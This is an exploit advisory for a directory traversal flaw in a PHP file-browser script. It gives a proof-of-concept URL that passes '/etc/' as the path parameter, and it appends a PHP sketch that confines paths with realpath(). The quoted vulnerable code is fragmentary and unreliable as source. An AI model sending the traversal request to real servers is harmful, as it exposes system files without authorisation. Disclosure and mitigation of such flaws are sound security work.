# Exploit Title: PHP File Browser Script 1 - Directory Traversal
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
# Software Link: https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "index.php" is vulnerable to directory traversal.
# An attacker can see and read all files in any directory whose name is known.
# Vulnerable File: index.php

Browsing Location: ".ucfirst($loc1)."
77 ".ucfirst($locdem2)."
78 ".ucfirst($locdem3)."
";}
79 else{
80 echo "Browsing Location: Demo
"; ?> // line 151

# PoC : https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]
# You can write the known directory name instead of [DirectoryName].
# Example: '/etc/' or '/var/www/'
# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/
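
# Mitigation sketch (added example, not the vendor's code and not part of the original advisory): one way to confine the "path" parameter to a single browsable tree before listing it. BROWSE_ROOT and resolve_browse_path() are hypothetical names; only the "path" query parameter comes from the advisory.

```php
<?php
// Added example. BROWSE_ROOT and resolve_browse_path() are hypothetical;
// the advisory only tells us that index.php reads a `path` query parameter.
const BROWSE_ROOT = __DIR__ . '/files';   // assumed: the only tree that may be listed

// Map a user-supplied `path` value to a directory inside $root.
// Returns the canonical directory, or null when the request must be refused.
function resolve_browse_path($requested, string $root = BROWSE_ROOT): ?string
{
    $rootReal = realpath($root);
    // Fail closed on a missing root, array-valued parameters and NUL bytes.
    if ($rootReal === false || !is_string($requested) || strpos($requested, "\0") !== false) {
        return null;
    }
    // Treat the value as relative to the root: "/etc/" becomes "<root>/etc/".
    $candidate = $rootReal . DIRECTORY_SEPARATOR . ltrim($requested, "/\\");
    // realpath() resolves "..", "." and symlinks; it returns false if nothing exists there.
    $real = realpath($candidate);
    if ($real === false || !is_dir($real)) {
        return null;
    }
    // Compare canonical paths, with a trailing separator on the root so that
    // a sibling such as "<root>-backup" does not pass as a prefix match.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    $inside = ($real === $rootReal) || strncmp($real, $prefix, strlen($prefix)) === 0;
    if (!$inside) {
        return null;
    }
    return $real;
}

$raw = $_GET['path'] ?? '';
$dir = resolve_browse_path($raw);
if ($dir === null) {
    http_response_code(400);
    exit('Invalid path');
}
// Show the location relative to the root, HTML-escaped; list only $dir from here on.
$shown = substr($dir, strlen(realpath(BROWSE_ROOT))) ?: '/';
echo 'Browsing Location: ' . htmlspecialchars($shown, ENT_QUOTES, 'UTF-8');
```

# With this check a request for path=/etc/ resolves under BROWSE_ROOT or is refused with HTTP 400; a symlink inside the tree that points outside it is refused as well, because the comparison is made on the realpath() result.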